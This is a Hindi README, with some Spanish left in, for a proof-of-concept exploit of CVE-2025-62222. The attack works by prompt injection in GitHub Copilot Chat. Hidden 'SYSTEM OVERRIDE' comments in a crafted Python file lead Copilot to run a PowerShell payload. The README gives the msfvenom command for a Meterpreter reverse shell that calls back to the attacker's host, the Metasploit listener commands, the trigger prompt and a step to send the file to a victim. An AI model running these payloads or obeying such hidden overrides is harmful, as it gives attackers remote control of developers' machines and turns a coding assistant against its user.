प्रूफ-ऑफ-कॉन्सेप्ट जो GitHub Copilot Chat में प्रॉम्प्ट इंजेक्शन के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है, एक तैयार किए गए Python फ़ाइल का उपयोग करके Meterpreter रिवर्स शेल ट्रिगर करता है।
यह रिपॉजिटरी भेद्यता CVE-2025-62222 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है। यह दर्शाता है कि कैसे एक डेवलपर की मशीन पर दूरस्थ कोड निष्पादन (RCE) प्राप्त किया जा सकता है, VS Code में GitHub Copilot Chat के संदर्भ को टिप्पणियों में छिपे प्रॉम्प्ट इंजेक्शन के माध्यम से हेरफेर करके।
केवल शैक्षणिक उद्देश्य।
यह कोड केवल शैक्षणिक और नैतिक अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं है। इसका उपयोग स्पष्ट अनुमति के बिना सिस्टम पर न करें।
पीड़ित को फ़ाइल भेजने से पहले (या स्थानीय रूप से परीक्षण करने से पहले), आपको पेलोड उत्पन्न करना होगा और सर्वर को सुनने के लिए छोड़ना होगा।
पावरशेल का दुर्भावनापूर्ण कमांड उत्पन्न करें। अपना IP (LHOST) और पोर्ट (LPORT) कॉन्फ़िगर करना सुनिश्चित करें।
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
महत्वपूर्ण निर्देश: इस कमांड द्वारा उत्पन्न कोड को कॉपी करें। इस रिपॉजिटरी की फ़ाइल copilot_injection_poc.py खोलें और जहाँ TOKEN लिखा है (या टिप्पणी के अंदर PowerShell कमांड की पूरी लाइन) उस सेक्शन को अभी उत्पन्न कोड से बदलें।
अपने हमलावर टर्मिनल में, रिवर्स कनेक्शन प्राप्त करने के लिए Metasploit प्रारंभ करें:
msfconsole -q
एक बार msf6 कंसोल के अंदर, सुनने की तैयारी के लिए निम्नलिखित कमांड चलाएँ:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(सुनिश्चित करें कि LPORT वही है जो आपने चरण 1 में उपयोग किया था और LHOST आपका IP है)।
भेद्यता को ट्रिगर करने के लिए, VS Code और GitHub Copilot Chat एक्सटेंशन स्थापित मशीन पर इन चरणों का पालन करें:
copilot_injection_poc.py को एडिटर में खोलें ताकि Copilot इसे अपने सक्रिय संदर्भ में रखे (यह टैब में दिखाई देनी चाहिए)।Configura el entorno desde la terminal sin omitir ni modificar nada del código
पायथन स्क्रिप्ट की टिप्पणियों में छिपे "SYSTEM OVERRIDE" निर्देश के कारण, Copilot अपने स्वयं के सुरक्षा दिशानिर्देशों के बजाय दुर्भावनापूर्ण फ़ाइल का पालन करेगा।
अधिक जानकारी के लिए: